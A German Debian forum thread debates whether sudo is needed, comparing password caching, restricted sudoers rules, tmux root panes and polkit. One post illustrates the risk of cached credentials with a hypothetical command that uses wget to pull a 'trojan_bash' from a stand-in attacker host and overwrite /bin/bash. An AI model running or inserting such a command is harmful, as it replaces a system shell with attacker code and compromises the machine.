braucht man "sudo" ?

Smalltalk
geier22

Re: braucht man "sudo" ?

Beitrag von geier22 » 02.12.2017 15:38:03

@niemand :
Ich glaube, dass gerade ein Neuling von den vielen - aus meiner Sicht eher unnötigen - Root-PW Abfragen irritiert wird.
Nicht umsonst ist dadurch bei Ubuntu die Verwässerung von Sudo entstanden.
Ich habe seit kurzem Sudo und gksu (gksudo kdesudo) aus meinem System verbannt. Da z.B. kein einziger Editor eine eigene Policy mitbringt, ist es nur möglich über gksu (also sudo) diesen mit Rootrechten zu starten. (alternative wäre Root- Terminal mit Befehl.
Beides wäre "etabliert". Aber eben im Bezug auf die Verwendung von sudo rückwärts führend.

Die Verbannung von sudo samt Anhängen war aber nur möglich, da ich mir für diverse Programme eigene Policies angelegt habe, um z.B. einen Editor als Root aus einen Dateimanager heraus starten zu können, bzw. die Möglichkeit zu haben, einen Starter anzulegen. Wohlgemerkt : Mit PW- Abfrage :!:
Ich halte das z.B. für sicherer als gleich den ganzen Dateimanager mit pkexec (die haben alle eine Policy) als Root zu starten. Was - soweit ich das beurteilen kann - die "etablierte Prozedur" wäre. Das über die Konsole zu machen halte ich für archaisch und nicht zeitgemäß.

Man kann aber nicht von einem Neuling verlangen, dass er dies von Anfang an beherrscht. Und stattdessen über sudo schimpfen aber keine vernünftig anzuwendenden Alternativen im System haben. Für Dolphin gibt es einen Haufen sehr praktische Erweiterungen, die alle auf sudo aufsetzen. Warum macht man sich hier keine weitergehenden Gedanken?
Das, meine ich, ist lediglich eine Frage des Designs der einzelnen Programme. Und- dass man sich Gedanken darüber macht.
Zuletzt geändert von geier22 am 02.12.2017 16:06:12, insgesamt 1-mal geändert.

DeletedUserReAsG

Re: braucht man "sudo" ?

Beitrag von DeletedUserReAsG » 02.12.2017 15:45:11

Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.

Was Lord_Carlos’ sudo-Beispiel angeht:

Code: Alles auswählen

$ make blub → libbla fehlt
$ [Strg+bm] → # aptitude install libbla
# [Strg+bm] → $ make blub
… ohne, dass ich jeweils das Passwort eingeben muss. Und ohne sudo. Aber mit tmux, und die Histories bleiben fein getrennt :)

Benutzeravatar
Lord_Carlos
Beiträge: 5578
Registriert: 30.04.2006 17:58:52
Lizenz eigener Beiträge: GNU Free Documentation License
Wohnort: Dänemark

Re: braucht man "sudo" ?

Beitrag von Lord_Carlos » 02.12.2017 16:00:31

niemand hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 15:45:11
Was Lord_Carlos’ sudo-Beispiel angeht:

Code: Alles auswählen

$ [Strg+bm] 
Ich vermute das wechselt zwischen zwei Aktiven Sitzungen? Also root ist immer eingelogged?
niemand hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 15:45:11
Aber mit tmux, und die Histories bleiben fein getrennt :)
Will ich eben ja nicht.
Gibt immer mehr als 3 Wege etwas zu loesen unter Linux.

Code: Alles auswählen

╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!

geier22

Re: braucht man "sudo" ?

Beitrag von geier22 » 02.12.2017 16:01:46

Animefreak79 hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 15:24:48
Wow, was hab ich hier bloß losgetreten? O_o Nur nochmal kurz:
@geier22 (wegen der Logfiles):
Jo - das Hast du - aber anscheinend - wie ich schon sagte eben eine Frage des Designs .
Hab mal gleich recherchiert:

SparkyLinux Buster Lxqt

Code: Alles auswählen

hans@hans-pc:~$ ls -al /var/log/auth.log
-rw-r--r-- 1 root root 53127 Dez  2 15:45 /var/log/auth.log
Original Debian Stretch LXDE

Code: Alles auswählen

hans@debian:~$ ls -al /var/log/auth.log
-rw-r----- 1 root adm 2586 Dez  2 15:40 /var/log/auth.log
und Siduction KDE:
Mach ich mal komplett:NoPaste-Eintrag40078

Da hat sich wohl was zum Sinnvollen geändert :THX:

DeletedUserReAsG

Re: braucht man "sudo" ?

Beitrag von DeletedUserReAsG » 02.12.2017 16:09:49

Lord_Carlos hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 16:00:31
Ich vermute das wechselt zwischen zwei Aktiven Sitzungen? Also root ist immer eingelogged?
Es wechselt bei mir zwischen zwei Panes. Root bekommt sein Pane, wenn er das erste Mal gebraucht wird und das Pane wird geschlossen, wenn er nicht mehr gebraucht wird.
Lord_Carlos hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 16:00:31
Gibt immer mehr als 3 Wege etwas zu loesen unter Linux.
Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg. Wenn in der sudoers allerdings festgelegt ist, dass der User nur genau "apt install" ausführen darf, sieht’s wieder etwas anders aus. Dann kann ’ne böswillige Software allenfalls das System vollaufen lassen, und das bemerkt man dann hoffentlich rechtzeitig, um’s zu stoppen :)

Benutzeravatar
Lord_Carlos
Beiträge: 5578
Registriert: 30.04.2006 17:58:52
Lizenz eigener Beiträge: GNU Free Documentation License
Wohnort: Dänemark

Re: braucht man "sudo" ?

Beitrag von Lord_Carlos » 02.12.2017 16:14:29

niemand hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 16:09:49
Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Aber wie ist das schlimmer als ein root panel das immer da ist?

Code: Alles auswählen

╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!

Radfahrer

Re: braucht man "sudo" ?

Beitrag von Radfahrer » 02.12.2017 16:18:02

niemand hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 15:45:11
Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.
Genau so sehe ich das auch. Wenn alles "einfach so" geht, merkt ein Einsteiger gar nicht, was er da macht.
niemand hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 16:09:49
Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Und nochmal volle Zustimmung.

Wenn ich root- und Nutzerbefehle abwechselnd eingeben muss, öffne ich halt zwei Terminals.

DeletedUserReAsG

Re: braucht man "sudo" ?

Beitrag von DeletedUserReAsG » 02.12.2017 16:23:01

Lord_Carlos hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 16:14:29
Aber wie ist das schlimmer als ein root panel das immer da ist?
Angenommen, du hast das Makefile nicht geprüft, sondern, weil’s aus vermeintlich sicherer Quelle stammt (die aber leider, wie’s ja ab und zu passiert, aufgemacht wurde) gleich durchlaufen lassen. Dir fehlt eine Lib → „sudo“, Userpass, installieren, alles fein. Du lässt das File nochmal durchlaufen, die Lib ist nun da, und nebenbei installiert’s dir mit etwa „sudo wget -o /bin/bash https://böslinge.inc/trojan_bash“ eine hübsche neue Shell. Dies z.B. kann bei der Variante mit dem Multiplexer nicht passieren. Abgesehen davon ist das Root-Pane nicht immer da, sondern wird wieder zugemacht, sobald der Build durch ist. Während deine 15 Minuten möglicherweise noch nicht abgelaufen sind, nachdem du fertig bist, und noch anderen Kram mit dieser Shell machst.

Benutzeravatar
Lord_Carlos
Beiträge: 5578
Registriert: 30.04.2006 17:58:52
Lizenz eigener Beiträge: GNU Free Documentation License
Wohnort: Dänemark

Re: braucht man "sudo" ?

Beitrag von Lord_Carlos » 02.12.2017 16:48:41

Mhh, so oder so bin ich gefickt. Crypto Währung mining, spam versenden, Daten lesen/loeschen etc. alle ohne root.
Ich sehe ein das eines Schlimmer ist als das andere, aber ob mich nun jemand mit einer Waffe erschießt oder ich durch ein Messerstich langsam Sterbe, am ende bin ich tot.

Ich kenne mich mit make nicht so aus, aber koennte es bei #make install aus der root Konsole auch eine neue Shell installieren?

Sudo im anderem Pane ist dann das beste aus beiden Welten :) Weil man automatisch ausgelogged wird.

Code: Alles auswählen

╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!

DeletedUserReAsG

Re: braucht man "sudo" ?

Beitrag von DeletedUserReAsG » 02.12.2017 16:57:53

Sure, die Malware kann auch als User laufen. Aber mit UID0 lässt’s sich viel schöner verstecken und ist daher weit langlebiger. Außerdem wirkt Ransomware viel toller, wenn sie sich schon im Bootloader mit dem Hinweis meldet, das System wäre nun verschlüsselt und man solle doch dem armen Entwickler einige Kekse zukommen lassen, um das zu beheben. Und auch Keylogger und Screenshot/-recording-Programme laufen viel besser mit ausreichenden Berechtigungen. Auch nicht zu verachten sind die Ports unterhalb 1024, die sich nur mit UID0 aufmachen lassen.

# make install kann im Grunde alles überschreiben. Damit haben sich ja auch schon einige ihr System damit zerlegt: irgendwas damit installiert, das dann Files überschrieben hat, die ’nem installierten Paket gehört haben. Das ist einer der Hauptgründe, warum man’s gefälligst mit --prefix=~/… konfigurieren, und make install als User ausführen sollte.

Benutzeravatar
ingo2
Beiträge: 1124
Registriert: 06.12.2007 18:25:36
Lizenz eigener Beiträge: GNU Free Documentation License
Wohnort: Wo der gute Riesling wächst

Re: braucht man "sudo" ?

Beitrag von ingo2 » 02.12.2017 17:06:11

niemand hat geschrieben: ↑ zum Beitrag ↑
02.12.2017 16:09:49
Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Das sollte man dann wenigstens gleich in der sudoers ändern:

Code: Alles auswählen

Defaults	!lecture,tty_tickets,!fqdn,targetpw,timestamp_timeout = 0
Stammt au meiner Ubuntu-Vergangenheit ;-)

uname
Beiträge: 12041
Registriert: 03.06.2008 09:33:02

Re: braucht man "sudo" ?

Beitrag von uname » 02.12.2017 22:39:10

Ein falscher sudo-Befehl ist wie ein falscher root-Befehl. root ist root. Was soll das mit dem Abmelden? Was soll neben abgeforkten Prozessen noch mehr passieren? Oder werden Kindsprozesse wie screen, tmux, ... beendet? Kann das mal jemand testen?

Code: Alles auswählen

sudo whoami
Ich sehe keinen Vorteil im Ubuntu-sudo-Umfeld ... eher Nachteile.

Benutzeravatar
novalix
Beiträge: 1908
Registriert: 05.10.2005 12:32:57
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: elberfeld

Re: braucht man "sudo" ?

Beitrag von novalix » 03.12.2017 11:26:03

@Lord_Carlos Anwendungsbeispiel ist doch ein klassisches Einsatzszenario für sudo.
Allerdings eben nicht für eine Konfiguration à la "Mitglied der Gruppe sudo darf alles mit Password-Caching".
Wenn sein Softwarebau-User oder generischer ein Mitglied der Gruppe "Softwarebau" per /etc/sudoers das Recht bekommt "/usr/bin/apt" auszuführen, ist doch alles in Butter; selbst mit einem Timeout über Null (der Default bei Upstream liegt übrigens bei fünf Minuten).
Ein Aufruf von wget um eine Systemdatei zu überschreiben wie in @niemands Beispiel wäre dann nicht möglich.
Genau für solche Szenarien ist sudo konzipiert. Man muss es eben nur auch richtig konfigurieren.
Per aspera ad astra.
Das Wem, Wieviel, Wann, Wozu und Wie zu bestimmen ist aber nicht jedermannns Sache und ist nicht leicht.
Darum ist das Richtige selten, lobenswert und schön.

guennid

Re: braucht man "sudo" ?

Beitrag von guennid » 03.12.2017 11:33:52

Ich glaube, hier wollte auch niemand, ehmm...: keiner :wink:, die Nützlichkeit von sudo für bestimmte Zwecke und in sinnvoller Konfiguration bestreiten, aber "MAN" braucht sudo eben eher nicht. :wink:


Grüße, Günther

TomL

Re: braucht man "sudo" ?

Beitrag von TomL » 03.12.2017 12:10:51

novalix hat geschrieben: ↑ zum Beitrag ↑
03.12.2017 11:26:03
Man muss es eben nur auch richtig konfigurieren.
Vor dem Hintergrund, dass das m.M.n bei Debian gar nicht so ein großes Problem ist, wenn der unbedarfte User einfach nur den Hinweisen des Installers folgt und sich daran hält, empfinde ich das auch gar nicht so sehr als beunruhigend. Zumal diese Community ja hierzu auch eine deutliche Meinung hat. Das größere Problem sehe ich hier bei Ubuntu und Mint. Da wird definitiv kein "Newbie" oder Windows-Umsteiger sudo richtig konfigurieren, weil es in deren Community weder Hinweise dazu gibt, noch überhaupt ein Problembewusstsein besteht. Ganz im Gegenteil, da wird sogar das root-PWD als Sicherheitsrisiko hingestellt und munter der fahrlässige Missbrauch von sudo empfohlen. Natürlich juckt uns das hier nicht... aber da steckt schon Potential drin, dem Ruf von Linx allgemein zu schaden... muss nicht, aber es ist möglich... und das gefällt mir nicht.

geier22

Re: braucht man "sudo" ?

Beitrag von geier22 » 03.12.2017 12:29:11

Ich denke es ist im Augenblick so:
Es gibt das "Sudo - System" das allen lieb geworden ist, man es verdammt aber irgendwie doch haben will.

Zu allem Unglück kann man nun auch noch Debian per Installer "ubuntuisieren" :? :(

Und es gibt das PolicyKit (polkit polkit1) das, soweit ich weiß, noch relativ neu ist.
Beide Systeme existieren z.Z. mehr oder weniger gleichberechtigt nebeneinander. Was verwirrend ist, da beide Systeme Gleiches
ermöglichen.
Ich vermute mal, das sich die Sudo- Geschichte irgendwann erledigt haben wird.
Durch die vielen Diskussionen hier hab ich angefangen, mich mit dem Polkit etwas zu beschäftigen, und festgestellt, das Sudo einfach überflüssig ist. ----> apt purge sudo gksu* und ich lebe damit wunderbar :mrgreen: :THX:

Antworten